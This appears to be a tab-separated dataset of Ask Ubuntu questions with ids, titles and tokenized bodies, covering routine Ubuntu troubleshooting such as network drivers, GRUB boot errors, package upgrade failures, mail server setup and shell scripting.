383358	how to find erase and line kill character for ubuntu 12.10	i 'm new to unix and have bought today a copy of `` the unix programming environment '' . i 'm trying out the stuff from the book . but some of them are not working as expected like : to kill a line and re-type it again , @ character should be used : book $ ddtae @ date thu nov 28 18:12:47 ist 2013 my terminal $ ddtae @ ddtae @ : command not found another example is to use # to erase last character book $ dd # att # e # e which comes out as date and print it . my terminal $ dd # att # e # e dd # att # e # e : command not found in my system # is used for commment although they have mentioned that these characters are system dependent . how can i find the characters for my system to perform above two tasks .
383359	hpacucli on hp proliant dl320e gen8 with ubuntu 12.04lts 64bits	i 'm trying to get working the hp smart array utility `` hpacucli '' on a proliant dl320e gen8 server since it 's officially certified . the program is installed successfully ( i followed this guide ) but seems to not recognize the controller : ~ # hpacucli ctrl all show config error : no controllers detected . i tested it with the current 3.8 series kernels and with 3.2.0-23.36 with the same results . i 've also tried some other solutions i found googling like execute the program with `` uname26 '' or `` setarch '' .
383362	ubuntu taken total unallocated disk space in dual mode	i 've installed window 7 with 2 partitions and kept nearly 100gb unpartitioned to install ubuntu 12.04 . while installing ubuntu it has not been asked `` how much swap space should be allocate '' , it simply picked up total unpartitioned space . is it normal behavior ? , i 've observed that partition info will be asking while installing ubuntu as primary os instead of dual boot . and another thing is windows partitions are appearing under ubuntu devices and able to mount windows partitions . how its happening without any extra effort or without installing applications ? hope it wo n't create a issues for both os data ? i 'm new to dual boot usage , so thought to know information from here .
383363	ca n't upgrade procps on 12.04	if i 'm performing apt-get upgrade i get the following error : reading package lists ... done building dependency tree reading state information ... done the following packages will be upgraded : procps 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 0 b/235 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y traceback ( most recent call last ) : file `` /usr/bin/apt-listchanges '' , line 237 , in < module > main ( ) file `` /usr/bin/apt-listchanges '' , line 48 , in main debs = apt_listchanges.read_apt_pipeline ( config ) file `` /usr/share/apt-listchanges/apt_listchanges.py '' , line 83 , in read_apt_pipeline return map ( lambda pkg : filenames [ pkg ] , order ) file `` /usr/share/apt-listchanges/apt_listchanges.py '' , line 83 , in < lambda > return map ( lambda pkg : filenames [ pkg ] , order ) keyerror : 'procps' setting up procps ( 1:3.2.8-11ubuntu6.2 ) ... start : job failed to start invoke-rc.d : initscript procps , action `` start '' failed . dpkg : error processing procps ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : procps e : sub-process /usr/bin/dpkg returned an error code ( 1 ) and cat /etc/sysctl.d/*.conf /etc/sysctl.conf | sudo sysctl -p - returns : kernel.printk = 4 4 1 7 error : `` net.ipv6.conf.all.use_tempaddr '' is an unknown key error : `` net.ipv6.conf.default.use_tempaddr '' is an unknown key error : `` invalid argument '' setting key `` kernel.kptr_restrict '' net.ipv4.conf.default.rp_filter = 1 net.ipv4.conf.all.rp_filter = 1 net.ipv4.tcp_syncookies = 1 error : `` kernel.yama.ptrace_scope '' is an unknown key vm.mmap_min_addr = 65536 net.ipv6.conf.all.autoconf = 0 net.ipv6.conf.default.autoconf = 0 net.ipv6.conf.eth0.autoconf = 0 net.ipv6.conf.all.accept_ra = 0 net.ipv6.conf.default.accept_ra = 0 net.ipv6.conf.eth0.accept_ra = 0 net.ipv6.conf.all.autoconf = 0 net.ipv6.conf.default.autoconf = 0 net.ipv6.conf.eth0.autoconf = 0 net.ipv6.conf.all.accept_ra = 0 net.ipv6.conf.default.accept_ra = 0 net.ipv6.conf.eth0.accept_ra = 0 has anyone a clue what could be going wrong ?
383369	connection problem with update	i have installed ubuntu 12.04 and trying to install synaptic package manager using sudo apt-get update . this command has stuck at 0 % . i use a network proxy setting . internet is not working in update manager , terminal etc . its only working in firefox .
383375	i want to install csh but the following error appears	i need to install kdevelop and csh package on my ubuntu 13.10 os but could n't locate package and following errors appears ; reading package lists ... done building dependency tree reading state information ... done e : unable to locate package
383384	error while installating ubuntu 12.04 on dell poweredge 3520 laptop	i downloaded the ubuntu 12.04 .iso file from the ubuntu website . i extracted it and when i am installing it , it shows an error about some file missing and installation stops . i have tried installing many times and i also downloaded the software once more , but nothing happened differently .
383385	just installed ubuntu . cant enter passphrase	i have recently switched from windows 7 to ubuntu . after i installed and replaced windows 7 it told me to restart . once i restarted i came to a loading screen which says : unlocking the disk /dev/disk/by-uuid/33ebfb20-d2c-4738-80d3-0d34576dec03 ( sda_crypt ) enter passphrase : after which there is a box . the problem is neither the keyboard nor the mouse works . so how do i enter the passphrase without keyboard , or how do i get the keyboard working ? i was able to solve this by connecting the keyboard to the usb3 output .
383386	wireless on unbuntu 13.10 not working	so i have an oldish computer we got refurbished to begin with . i just bought a 1t hard drive , and put that in . i then downloaded the unbuntu disk file off the website and ran the disk on my computer . i also have 3 gbs of ram . when i log on , all i see for networks is the ethernet cable i 'm plugged into . i do n't see the wifi connection . i can see it on all my other computers , so it 's not a problem with the computer . i 'm able to access the internet fine through the ethernet cable , but i just ca n't see any wireless connections . please help [ edit ] so i got `` wifi radar '' hoping that it would help me connect to wireless . and a strange thing happened . in the terminal , is starting posting this error message over and over : 2013-11-28 13:53:29,018 : get_network_device : no wifi device found , please set this in the preferences . interface does n't support scanning .
383389	installing matrox video driver	ca n't open ./mtxdriver-installer-x86_32-1.4.7.run is the answer i get from xubuntu when i try to install my linux video driver from matrox . is this a known problem and is there a solution ?
383391	resolution stuck to 1024x768 , after installation	i installed ubuntu 13.10 on my dell optipex 760 with a fujitsu 1280x1024 resolution lcd but when i installed ubuntu 13.10 my resolution was stuck to 1024x768 . i followed the instruction on screen resolution stuck at 1024x768 but when i used xrandr it gave me the resolution 5:3 1280x1024 whereas my lcd is 4:3 1280x1024 .
383395	how childproof the keyboard	how could i make the keyboard/touchpad safe for my toddler to use on my laptop ? ( e.g . keep numbers and letters but do n't allow f1 , esc , touchpad , click events , etc . to work ) . i have read how to disable keys from the keyboard ? , but that does not discuss everything . i am wondering if there is a pre-existing solution so that i do not need to work through all of those details myself . i would like to be able to press a `` secret set of keys '' and then switch between `` safe '' keyboard mode and `` normal '' keyboard mode . i would like to do this so that i can use my keyboard , then my child may type on the keyboard , and then i can continue using the keyboard . thank you for all hints/tips . sorry if this is not the right forum for such a question , this is my first question here . > uname -- kernel-release -- kernel-version -- machine 3.2.0-56-generic # 86-ubuntu smp wed oct 23 09:20:45 utc 2013 x86_64 > cat /etc/os-release name= '' ubuntu '' version= '' 12.04.3 lts , precise pangolin '' id=ubuntu id_like=debian pretty_name= '' ubuntu precise ( 12.04.3 lts ) '' version_id= '' 12.04 ''
383396	ubuntu 13.10 64bit non-apt program needs 32bit functionality how ?	what happened to the ia32-libs package ? so i 've been reading through several answers about the ia32-libs package being no longer supported , which is cool . however , i have a somewhat unique circumstance . on my workstation at work , i 'm running ubuntu 13.10 on an amd64 , and i need to run liveperson , which requires java 6 , and 32-bitness . it 's also not available through apt , and has to be installed independently . while i was running 12.04 , there were ways to still get the ia32-libs package , which was necessary . is there a way to make this work on 13.10 ?
383397	how to setup domain on my home webserver ?	i have installed webserver apache and i am running the site perfectly with ip.now i want to get a free domain like .th , .co.vu or similar but i do n't . know how to setup it.my site is new so some free domain will do the , job like above stated domain.so plz guide me step by step as i am little new to linux and web server.and if you have some good free domain company feel free to share it with me .
383398	curser does not move when typing password on internet sites	i am unable to log into my aol mail . i type in my screen name . all ok ; however , when i type in my password the curse does not move and no x appears . eventhough the x 's do n't appear i press the enter or sign in . then the red invalid warning appears . reply . no i did not add any stuff . i did go to setting and disable java stuff . still can not type in password . cursor just stays still . thanks
383399	ubuntu 13.10 not recognizing other oss at boot	i have been using ubuntu for 2 years now , but i have to switch to windows for work . i replaced my ubuntu 12.04 with windows 8.1 . i hated 8.1 , so i moved back to linux , but this time ubuntu 13.10 . it has been nothing but problematic . too many issues to descuribe . the biggest problem is that it will not allow me to load another os at reboot . the only .iso it recognizes is ubuntu 13.10 . it will not even allow for the elementary linux , windows 8.1 or windows 7 . firstly , i thought i was writing the .iso disk improperly . i followed all the guides and no luck . the ubuntu screen does say , when i boot , that kvm is disabled by bios . i learned that this is only for virtual machines and should n't affect me ? i could really use the help because i have a lot of work to finish ... thanks ,
383401	why does not the atime option of mount always update atime of files as expected ?	i needed to detect read access to certain files so i needed the file system to update the atime attribute of files the usual way . default mount options in the default state the file system did not update atime as expected though i did not use the noatime option : $ cat /etc/fstab | grep '/home ' # /home was on /dev/sda7 during installation uuid=d7e67903-f24d-45a7-be90-6a134c9c1ae9 /home ext4 defaults 0 2 $ mount | grep '/home ' /dev/sda7 on /home type ext4 ( rw ) $ cat /etc/mtab | grep '/home ' /dev/sda7 /home ext4 rw 0 0 the atime on a file was updated only sometimes . later i realized that the file system is mounted with the new relatime option . $ cat /proc/mounts | grep '/home ' /dev/sda7 /home ext4 rw , relatime , user_xattr , barrier=1 , data=ordered 0 0 the obvious solution does not work so it seems that the relatime option is the default on ubuntu 12.04 . the solution seemed to be easy - explicitly state the non-default atime option : $ sudo mount -o remount , atime /home i was suprised that the actual mount options looked exactly the same like without the atime option . $ mount | grep '/home ' /dev/sda7 on /home type ext4 ( rw ) $ cat /etc/mtab | grep '/home ' /dev/sda7 /home ext4 rw 0 0 $ cat /proc/mounts | grep '/home ' /dev/sda7 /home ext4 rw , relatime , user_xattr , barrier=1 , data=ordered 0 0 in fact the system was behaving exactly the same as without the atime option . questions what is going on ? why can not i simply use the atime option ? what can i do to get the normal atime functionality ?
383404	ca n't get to the host in ubuntu	i’m using vmware on windows 8 environment.. running ubuntu and trying to get into the host ( windows 8 ) and is asking me for a password . the password i use to get in ubuntu don’t work . nothing works and i’m going crazy . someone please help me .
383406	how to rename a node of a kvm server	i am facing an issue in renaming a node ; i have a kvm server ( base server ) on which i have 5 virtualized nodes as follows : # virsh list -- all id name state -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 1 node1 running 2 node2 running 4 node3 running 5 node4 running 6 node5 running i want to rename the node5 to system5 . please suggest me , how to resolve this . i tried editing the name by following method [ root @ kvm-main mysystem ] # virsh edit node5 < name > node5 < /name > changed it to < name > system5 < /name > but i still get the following error : error : operation failed : domain 'node5 ' is already defined with uuid xxxxxxxx-xxxxxx-3516-xxxxx-ad6f8axxxxxec
383407	13.04 ethernet balance-alb not working	i have a single switch configuration , where multiple nodes connect through the same switch , and they all have dual interfaces . i 'd like to maximize throughput for both all-to-all communication , and communication just between two nodes as well . i figured balance-alb will be my best choice , however something does not work properly , and not even a simple ping makes it through . this is my /etc/network/interfaces config file : auto lo iface lo inet loopback auto eth0 iface eth0 inet manual bond-master bond0 auto eth1 iface eth1 inet manual bond-master eth1 auto bond0 iface bond0 inet static address 148.6.155.1 gateway 148.6.155.254 netmask 255.255.255.0 bond-mode 6 bond-miimon 100 bond-slaves eth0 eth1 now when i start the networking service , it bring up bond0 as a netowrk interface , but it is completely invisible to the network , and i can not even ping from it . ifconfig shows that the hwaddr is 00:00:00:00:00:00:00:00 so clearly something is not right . cat /proc/net/bonding/bond0 shows : ethernet channel bonding driver : v3.7.1 ( april 27,2011 ) bonding mode : load balancing ( round-robin ) mii status : down mii polling interval ( ms ) : 0 up delay ( ms ) : 0 down delay ( ms ) : 0 cat /etc/udev/rules.d/70-persistent-net.rules shows : # pci device 0x10ec : /sys/devices/pci0000:00/0000:00:1c.2/0000:0d:00.0 ( r8169 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' 00:26:18 : fd:20 : ee '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth1 '' # pci device 0x10ec : /sys/devices/pci0000:00/0000:00:1c.1/0000:0e:00.0 ( r8169 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' 00:26:18 : fd:26:5e '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' can someone tell me what can be wrong ? thank you in advance ...
383412	how change a mention about user folder after user name changing correctly	colleagues . i renamed my username from test to drobazko . also i renamed a user folder from /home/test to /home/drobazko . i am developing under ruby rvm . and i found out that the /home/test/ path was mentioned in many files . how can i replace this line in files correctly .
383414	how to upgrade several versions at once ?	so today i decided to upgrade from ubuntu 12.04 all the way to 13.10 , as my laptop has the recommended specs . i upgraded from 12.04 to 12.10 just fine , but when i upgraded to 13.04 , it was 1:50 am , and i left it running overnight so i could catch some z 's . when i checked on it this morning , it said that a bunch of errors had occurred , and so i just clicked close . then it said it finished the upgrade with some errors , and so i restarted my laptop . when it booted , it brought me to the system recovery screen , and i did everything available to fix the problems there . i then restarted my laptop again , but when it booted , it was just a black screen , then became a terminal and nothing more . i 've now erased 13.04 and 12.10 and put 12.04 back on my laptop . any ideas/suggestions ? i used the update manager to upgrade distros . does that have anything to do with it ?
383418	problem while installing android sdk - fastboot and adb are not working ?	i am trying to install adt without using standalone installer.with help of this guide http : //forum.xda-developers.com/showthread.php ? t=2302780 i am using ubuntu 13.04 , so when i try to call adb or fastboot , it alwasys ends up as permission denied . parthiban @ upk-sys : ~ $ adb bash : /media/parthiban/new volume1/idea-ic-129.1359/android-sdk-linux/platform- tools/adb : permission denied parthiban @ upk-sys : ~ $ fastboot bash : /media/parthiban/new volume1/idea-ic-129.1359/android-sdk-linux/platform-tools/fastboot : permission denied i have edited .bashrc as instructed in that guide . any idea ? ?
383421	why is my notebook going to sleep when lid is closed even if i disabled it ?	here is my situation : i installed xubuntu 13 . 10 i added the cinnamon ppa and installed cinnamon 2 . 0 i removed all the gnome stuff , that came with xubuntu everything went fine so far ... but ... these are my settings : in my power settings the following is set : when lid is closed ( on battery ) : suspend when lid is closed ( on ac ) : do nothing in my lock settings i set that there should be a password prompt , after going to suspend/waking up now this strange behaviour : if i close my lid , be it on battery or on ac power , the notebook suspends . but after waking it up , there is no password prompt . if i manually activate suspend mode ( special key on keyboard/system menu ) there is a password prompt after waking up . my question : why is this happening ? why does the power daemon ( there is only `` upowerd '' running ) ignores my power settings ? what software/settings has to be installed/set to make this work properly ?
383423	ca n't set up imap on a working email server	i 've been trying to set up my local mail server using this tutorial on my domain mydomain.me . i got to the point where i can successfully receive mail send to my address but i ca n't set up an imap account with thunderbird ( cf snapshot ) . weirdly enough , thunderbird does n't detect my imaps service . i tested it with openssl s_client -connect mydomain.me:993 which seem to work fine . of course when i try to set up encryption-free imap , i run into trouble . any idea on what i am doing wrong ? my first guess are dns records , and my second my postfix conf . i forgot to mention i 'm trying to set up the account on another machine which is not necessarily on the same network . content of cat main.cf | egrep -v `` ^ # '' : smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) biff = no append_dot_mydomain = no readme_directory = no smtpd_tls_cert_file=/etc/ssl/certs/dovecot.pem smtpd_tls_key_file=/etc/ssl/private/dovecot.pem smtpd_use_tls=yes smtpd_tls_auth_only = yes smtp_tls_security_level = may smtp_tls_loglevel = 2 smtpd_tls_received_header = yes smtpd_sasl_type = dovecot smtpd_sasl_path = private/auth smtpd_sasl_auth_enable = yes smtpd_recipient_restrictions = permit_sasl_authenticated , permit_mynetworks , reject_unauth_destination myhostname = mydomain.me myorigin = $ mydomain alias_maps = hash : /etc/aliases alias_database = hash : /etc/aliases mydestination = localhost virtual_transport = lmtp : unix : private/dovecot-lmtp virtual_mailbox_domains = mysql : /etc/postfix/mysql-virtual-mailbox-domains.cf virtual_mailbox_maps = mysql : /etc/postfix/mysql-virtual-mailbox-maps.cf virtual_alias_maps = mysql : /etc/postfix/mysql-virtual-alias-maps.cf local_recipient_maps = $ virtual_mailbox_maps relayhost = mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 mailbox_size_limit = 0 recipient_delimiter = + inet_interfaces = all content of tail -n 30 /var/log/mail.log : nov 28 16:55:07 myservername postfix/anvil [ 5449 ] : statistics : max connection rate 7/60s for ( smtp:192.168.0.254 ) at nov 28 16:51:27 nov 28 16:55:07 myservername postfix/anvil [ 5449 ] : statistics : max connection count 1 for ( smtp:192.168.0.254 ) at nov 28 16:51:14 nov 28 16:55:07 myservername postfix/anvil [ 5449 ] : statistics : max cache size 2 at nov 28 16:51:47 nov 28 16:57:01 myservername postfix/smtpd [ 6006 ] : connect from unknown [ 192.168.0.254 ] nov 28 16:57:01 myservername postfix/smtpd [ 6006 ] : disconnect from unknown [ 192.168.0.254 ] nov 28 16:57:01 myservername postfix/smtpd [ 6006 ] : connect from unknown [ 192.168.0.254 ] nov 28 16:57:01 myservername postfix/smtpd [ 6006 ] : improper command pipelining after ehlo from unknown [ 192.168.0.254 ] : quit\r\n nov 28 16:57:01 myservername postfix/smtpd [ 6006 ] : disconnect from unknown [ 192.168.0.254 ] here are my dns records : $ ttl 3600 @ in soa dns106.ovh.net . tech.ovh.net . ( 2013112701 86400 3600 3600000 300 ) in ns dns106.ovh.net . in ns ns106.ovh.net . in mx 1 mydomain.me . in a xx.xxx.x.xxx in txt `` 1|www.mydomain.me '' ftp in cname mydomain.me . mail in cname ns0.ovh.net . ox in cname ox.ovh.net . pop3 in cname ns0.ovh.net . smtp in cname ns0.ovh.net . www in mx 1 mydomain.me . www in a xx.xxx.x.xxx www in txt `` 3|welcome '' www in txt `` l|fr ''
383424	how to boot into ubuntu ?	i have a windows 7 computer ( i am typing this on it ) . i put ubuntu on a usb flash drive , and installed it as i was instructed . after rebooting , it booted back into windows without asking me if i wanted to boot into windows or ubuntu . i booted from the usb drive , and it acted as if i had never installed ubuntu . please help !
383426	trying to install nvidia corporation mcp61 ethernet ubuntu 13.04	i 've just uninstalled windows 7 from my pc and installed a fresh copy of ubuntu 13.04 on my desktop . everything has gone well except for one very important thing , namely the network card . my network card which according to the following command i ran : lspci -vv | grep `` ethernet '' is a nvidia corporation mcp61 ethernet ( rev a2 ) . it does work fine under windows but for some reason i ca n't get it to work under ubunutu . trying to find drivers to install this card also have proved useless , even though there are countless windows drivers for this onboard network card . is there some generic driver i can install to get this onboard networking card to work ?
383427	ca n't connect to internet by ethernet on 13.10	i have recently installed ubuntu 13.10 , but u ca n't connect to the internet . i 'm using an ethernet connection , but when i try to connect it just loads for a while and then tells me im disconnected . after using the lspci -v command i got this information on the ethernet controller . 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 06 ) subsystem : asustek computer inc. p8p67 and other motherboards flags : bus master , fast devsel , latency 0 , irq 46 i/o ports at e800 [ size=256 ] memory at fafff000 ( 64-bit , prefetchable ) [ size=4k ] memory at faff8000 ( 64-bit , prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : r8169
383428	how to find servername ?	ok i have created a webserver in linux and everything is fine except i want to use a domain.i am registering a .tk domain but when i go to dns it has two servername blocks and two ip address block.as for ipaddress i know that i have to write my computer ip.but i do n't really know what to write in name server.do you know how to find in linux what is name server and do i have to write name server and up twice or single will work ? and is there a linux command to find name server .
383429	hp envy 15 wifi bug	i 've recently bought a hp envy 15 notebook pc 15-j082sf , i installed ubuntu 13 on it and i ca n't get my wifi work , the wifi button stay orange and not white as it should be . i detect the wifi network but i ca n't connect to them i tried to do this sudo rfkill list all the result is that : 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : hp-wifi : wireless lan soft blocked : no hard blocked : no 2 : hp-bluetooth : bluetooth soft blocked : no hard blocked : no i tried a lot of thing i found on the internet but i ca n't fix it any help please ? what i tried : https : //answers.launchpad.net/ubuntu/+question/233668 i found that if i type this modprobe -r rt2800pci modprobe rt2800pci the wifi work for like 10s then goes off again any idea
383433	why does windows mounted folder freeze after some time ?	i have an ubuntu 12.04 server on a dmz and a windows server on an internal network . now i need to mount a folder of the windows server on my ubuntu server . i use the mount command and all goes fine ... but after some time if i try to open the ubuntu folder where the mount is , i ca n't . the folder is in /media , so i run cd /media but when i run the ls command it sticks and the terminal is frozen . in order to access the folder again i have to umount it . then if i try to mount again the mount command sticks and i have to do ctrl + c to close it . at that point the only thing i can do is reboot ubuntu , and when server is up i find the mounted folder correctly , because it is in fstab . i have another ubuntu machine with another share on same windows server , and has worked fine for months , so i do n't understand what the problem can be . the fstab entry is the same on both ubuntu servers : //192.168.20.8/shared/flusso_homebox /media/flusso_homebox smbfs auto , username=xxxx , password=xxxx , file_mode=0777 , dir_mode=0777 , rw 0 0
383436	how do you make your ubuntu work with workspace instead of viewports ?	im using ubuntu 12.04 lts and for some reason im working with viewports instead of workspace , how do i know this ? after dealing with the fact that i cant put a different background for every workspace with those tutorials : is it possible to have a different background for each workspace ? different background or wallpaper per workspace ubuntu 12.04 and after trying to do this with wallpapoz i come with a conclusion ( with feedback from the author of wallpapoz ) that im working with viewports , i put this in the terminal input : xprop -root _net_number_of_desktops output : _net_number_of_desktops ( cardinal ) = 1 and input : xdotool get_num_desktops output : xdotool get_num_desktops = 1 finally input : xdotool get_desktop_viewport output : xdotool get_desktop_viewport = 1024 0 please if you have any advice to give in order to solve this ill be very grateful
383437	i 'm parsing the output of `ls` and something went wrong	i made this simple script to copy a file recursively to many sub-directories . here i am showing the problem for 3 sub-directories . i have 3 sub-directories and 2 files in a directory as follows 0.003/ 0.007/ 0.015/ program.cpp driver.sh* i want to copy program.cpp to all these sub-directories using myscript.sh shown below : # ! /bin/bash mydir=`pwd` for i in `ls -la $ mydir | grep `` [ 0-9 ] $ '' | awk ' { print $ nf } '` do if [ -e $ mydir/ $ 1 ] then echo `` cp -i $ 1 $ i/ '' else echo `` file \ '' $ 1\ '' not found in current directory '' fi done i have put the cp inside echo to test the code . the output is strange , cp -i program.cpp 32/ cp -i program.cpp 0.003/ cp -i program.cpp 0.007/ cp -i program.cpp 0.015/ the output of ls -la total 32k drwxr-xr-x . 5 gulu workg 4.0k nov 29 2013 . drwxr-xr-x . 7 gulu workg 4.0k nov 29 2013 .. drwxr-xr-x . 2 gulu workg 4.0k nov 26 19:09 0.003 drwxr-xr-x . 2 gulu workg 4.0k nov 26 19:09 0.007 drwxr-xr-x . 2 gulu workg 4.0k nov 26 19:09 0.015 -rw-r -- r -- . 1 gulu workg 4.2k nov 29 2013 program.cpp -rwxr-xr-x . 1 gulu workg 982 nov 26 08:22 driver.sh the output of ls -la $ mydir | grep `` [ 0-9 ] $ '' | awk ' { print $ nf } ' 0.003 0.007 0.015 there are only three values in i then how is it producing four output ? anyway i have solved the problem with an additional condition [ -d $ mydir/ $ i ] . but my question is how the script is producing the first line cp -i driver.sh 32/ ?
383438	what is the order of execution of the scripts at /etc/rc0 ... 6.d/ ?	the scripts linked at /etc/rc0 ... 6.d/ have numbers at the begining right after the letter s/k , so the question is what is order of execution ? from the lower to higher or higher to lower ? i also would like to know if there is any rules on these number , can i create a script with number 1 , 2 , ... , 97 , 98 , or only some specific numbers are allowed ? i 'd like to run a script after the system boot and before the system shutdown , but as those scripts needs internet connection to perform its tasks at which runlevel folder should i place it ?
383440	my ubuntu 13.10 is booting directly to console , how do i change it back to gui ?	i installed 12.10 using the exe on my windows vista computer and updated it to 13.10 normally . i changed the login to console , then , after i restarted i realized that my daughter would n't know how to use it . how do i change it back ? not temporarily but permanently .
383442	bluetooth not turning on ?	i have a vaio vpccw21fx with a brand new installed ubuntu 13.10 and i 'm trying to connect a wedge mobile keyboard . so i went into the system settings , bluetooth and tried to turn it on but as soon as i click on the switch , it stays on for 1 or 2 seconds and then it goes back to the off position automatically ... is there any compatibility issue ? what can i do ?
383443	screensaver that displays random quotes	i have an app on my android phone called quotes that uses the daydream feature of android to display random quotes while the phone is charging . i was wondering if there is a screensaver for linux that does the same thing .
383446	pkcs11_listcerts error message	i am receiving the following error message when attempting to execute pkcs11_listcerts on ubuntu 13.10 x64 os . please let me know how this can be resolved . on my system , the /usr/lib/opensc-pkcs11.so does not appear to be present . pkcs11_listcerts debug : pkcs11_listcerts.c:69 : loading pkcs # 11 module ... debug : pkcs11_lib.c:975 : pkcs # 11 module = [ /usr/lib/opensc-pkcs11.so ] debug : pkcs11_listcerts.c:72 : load_pkcs11_module ( ) failed : stat ( ) failed : no such file or directory
383448	grub does n't render correctly in 1920x1080	i have put those lines into /etc/default/grub : grub_gfxmode=1920x1080x32 grub_gfxpayload_linux=1920x1080x32 ( of course , update-grub was done after that ) however , grub does n't look right - it has black margins around , renders noticably slow ( takes about 1-2 seconds to fill the screen ) , and the font looks weird - it feels like it makes 1920x1080 image but tries to fit it into a smaller resolution . after installing nvidia proprietary drivers , the problem also applies to plymouth . if i type vbeinfo in grub 's console , it does list 1920x1080 with 32-bit color mode . what can i try to fix it ?
383449	mpd : failed to read mixer for 'my alsa device ' : no such mixer control : pcm	i had mpd/mpc running on my ubuntu 12.04.3 lts headless , x-less server . i decided to switch out the songs ; i moved the old songs out of the /music directory , moved the new songs in , and ran mpc update , but it failed to resume playing . naturally , i started changing things , according to what i could find on google , but nothing seems to work . when i run mpc commands , like mpc status , i get the error message failed to read mixer for 'my alsa device ' : no such mixer control : pcm . i can play music when i use the command sudo aplay piano.wav , and similar commands . here 's some diagnostic info : http : //pastebin.com/1czbeybc . it contains /etc/mpd.conf aplay -l aplay -l mpd verbose from the command line amixer & amixer contents i would appreciate any pointers ! thank you .
383457	networking buggy in 12.04 lts	wifi keeps dropping security code and asking for authentication . will not connect now even when i re-edit the connection or enter manually in the pop up that continually occurs . seems stuck in a loop . no luck re-booting several times . results : peter @ peter-laptop : ~ $ lspci 00:00.0 host bridge : advanced micro devices , inc. [ amd/ati ] rs300 host bridge ( rev 02 ) 00:01.0 pci bridge : advanced micro devices , inc. [ amd/ati ] rs300 agp bridge 00:13.0 usb controller : advanced micro devices , inc. [ amd/ati ] ohci usb controller # 1 ( rev 01 ) 00:13.1 usb controller : advanced micro devices , inc. [ amd/ati ] ohci usb controller # 2 ( rev 01 ) 00:13.2 usb controller : advanced micro devices , inc. [ amd/ati ] ehci usb controller ( rev 01 ) 00:14.0 smbus : advanced micro devices , inc. [ amd/ati ] smbus ( rev 1a ) 00:14.1 ide interface : advanced micro devices , inc. [ amd/ati ] dual channel bus master pci ide controller 00:14.3 isa bridge : advanced micro devices , inc. [ amd/ati ] device 434c 00:14.4 pci bridge : advanced micro devices , inc. [ amd/ati ] ixp200 3com 3c920b ethernet controller 00:14.5 multimedia audio controller : advanced micro devices , inc. [ amd/ati ] ixp150 ac'97 audio controller ( rev 01 ) 00:14.6 modem : advanced micro devices , inc. [ amd/ati ] ixp ac'97 modem ( rev 01 ) 01:05.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rv350/m10 [ mobility radeon 9600 pro turbo ] 02:00.0 firewire ( ieee 1394 ) : via technologies , inc. vt6306/7/8 [ fire ii ( m ) ] ieee 1394 ohci controller ( rev 80 ) 02:02.0 ethernet controller : qualcomm atheros ar5212/ar5213 wireless network adapter ( rev 01 ) 02:03.0 ethernet controller : realtek semiconductor co. , ltd. rtl-8139/8139c/8139c+ ( rev 10 ) 02:04.0 cardbus bridge : ene technology inc cb-710/2/4 cardbus controller 02:04.1 flash memory : ene technology inc ene pci memory stick card reader controller 02:04.2 sd host controller : ene technology inc ene pci secure digital card reader controller 02:04.3 flash memory : ene technology inc flash memory : ene technology inc : peter @ peter-laptop : ~ $ ifconfig -a eth0 link encap : ethernet hwaddr 00:0f : b0:3a:19:54 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:19 base address:0xa000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:900 errors:0 dropped:0 overruns:0 frame:0 tx packets:900 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:66460 ( 66.4 kb ) tx bytes:66460 ( 66.4 kb ) wlan0 link encap : ethernet hwaddr 00:11 : f5:29 : f1:38 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) peter @ peter-laptop : ~ $ sudo iwconfig [ sudo ] password for peter : lo no wireless extensions . wlan0 ieee 802.11bg essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off eth0 no wireless extensions .
383459	ubuntu boot issue	so i recently installed ubuntu 13.10 x64 on my laptop that already has windows 7 x64 ( a dual boot installation ) and after restarting my laptop i get the following message . error : no such partition entering rescue mode ... grub rescue > _ most of the solutions talk about deleting or when uninstalling ubuntu this and this happened . i have used the same ubuntu.iso on my desktop and it works just fine ( also dual boot ) . i tried most the solutions i 've seen like re-installing grub . please help me out , i want to use both ubuntu and win7 .
